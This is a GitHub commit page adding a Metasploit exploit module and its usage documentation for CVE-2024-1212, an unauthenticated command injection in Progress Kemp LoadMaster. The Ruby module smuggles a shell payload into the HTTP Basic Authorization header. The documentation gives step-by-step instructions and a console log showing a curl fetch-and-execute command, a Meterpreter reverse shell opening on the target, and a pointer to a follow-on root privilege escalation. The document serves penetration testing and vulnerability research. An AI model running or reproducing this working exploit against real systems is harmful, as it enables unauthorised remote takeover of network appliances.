Skip to content

Commit

Permalink
Land #18972, Progress LoadMaster unauthenticated command injection mo…
Browse files Browse the repository at this point in the history 
…dule CVE-2024-1212

Merge branch 'land-18972' into upstream-master
  • Loading branch information
@bwatters-r7
bwatters-r7 committed Apr 26, 2024
2 parents a6cf1cd + 02c3115 commit 364d491
Show file tree
Hide file tree
Showing 2 changed files with 230 additions and 0 deletions.
97 changes: 97 additions & 0 deletions ...ion/modules/exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.md
View file
@@ -0,0 +1,97 @@
## Vulnerable Application
CVE-2024-1212: Progress Kemp LoadMaster Unauthenticated Command Injection

For more details on the vulnerability:
https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/

https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212

A trial VM which the exploit should work against out of the box can be downloaded from:
https://sso.kemptechnologies.com/register/kemp/vlm

The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.
https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw

## Verification Steps
1. Install the application
1. Start msfconsole
1. Do: `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection`
1. Do: `set RHOSTS <target loadmaster>`
1. Do: `set RPORT <port loadmaster is running on>`
1. Do: `set LHOST <your host IP>`
1. Do: `run`
1. You should get a shell as the `bal` user.
1. (Optional) use the module `exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024` to gain root privileges.
1. (Optional) use the script `run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc` to automatically run the above module.

## Scenarios

### LoadMaster 7.2.59.0.22007

``` msf
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > show options
Module options (exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.5.134.141 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
asploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI path to LoadMaster
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME GyzwtIbxq no Name to use on remote system when storing payload; cannot contain spaces or slash
es
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /tmp/ yes Remote writable dir to store payload; cannot contain spaces
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > run
[*] Command to run on remote host: curl -so /tmp/LlipoMVy http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/LlipoMVy; /tmp/LlipoMVy &
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /RByzlSnTzclKDpvXskXIrg
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.5.134.141:443 is vulnerable...
[+] The target is vulnerable.
[*] Sending payload...
[*] Client 10.5.134.141 requested /RByzlSnTzclKDpvXskXIrg
[*] Sending payload to 10.5.134.141 (curl/7.77.0)
[+] Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.141:29264) at 2024-04-12 17:08:57 -0500
meterpreter > sysinfo
Computer : 10.5.134.141
OS : SuSE 7.2 (Linux 4.14.137)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: bal
```
133 changes: 133 additions & 0 deletions modules/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb
View file
@@ -0,0 +1,133 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def flag_file
return @flag_file unless @flag_file.nil?

@flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5)
end

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Kemp LoadMaster Unauthenticated Command Injection',
'Description' => %q{
This module exploits an unauthenticated command injection vulnerability in
Progress Kemp LoadMaster in the authorization header after vversion 7.2.48.1.
The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF) and
7.2.48.10 (LTS).
},
'Author' => [
'Dave Yesland with Rhino Security Labs',
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-1212'],
['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],
['URL', 'https://kemptechnologies.com/kemp-load-balancers']
],
'DisclosureDate' => '2024-03-19',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
'Reliability' => [ REPEATABLE_SESSION ]
},
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Privileged' => false,
'Targets' => [
[
'Automatic', # Add logic to run the payload only once
{
'Payload' => {
'Prepend' => "[ -f #{flag_file} ] || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& ",
'Append' => ')',
'BadChars' => "\x3a\x27"
}
}
],
[
'Do_Not_Prepend_Runonce_Code', # This will likely result in 2-3 sessions
{
'Payload' => {
'BadChars' => "\x3a\x27"
}
}
]
],
'Default_target' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
'FETCH_WRITABLE_DIR' => '/tmp/',
'SSL' => true,
'RPORT' => 443
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/'])
])
end

def exploit
uri = normalize_uri(target_uri.path, 'access', 'set')

vprint_status('Sending payload...')

send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'param' => 'enableapi',
'value' => '1'
},
'authorization' => basic_auth("';#{payload.encoded};echo '", Rex::Text.rand_text_alpha(rand(8..15))),
'verify' => false
})
end

def on_new_session(client)
super
print_good('Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell')
end

def check
print_status("Checking if #{peer} is vulnerable...")

uri = normalize_uri(target_uri.path, 'access', 'set')

res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' => {
'param' => 'enableapi',
'value' => '1'
},
'authorization' => basic_auth("'", Rex::Text.rand_text_alpha(rand(8..15))),
'verify' => false
})

# No response from server
unless res
return CheckCode::Unknown
end

# Check for specific error pattern in headers or body to confirm vulnerability
if res.headers.to_s.include?('unexpected EOF while looking for matching') || res.body.include?('unexpected EOF while looking for matching')
return CheckCode::Vulnerable
else
return CheckCode::Safe
end
end

end

0 comments on commit 364d491

Please sign in to comment.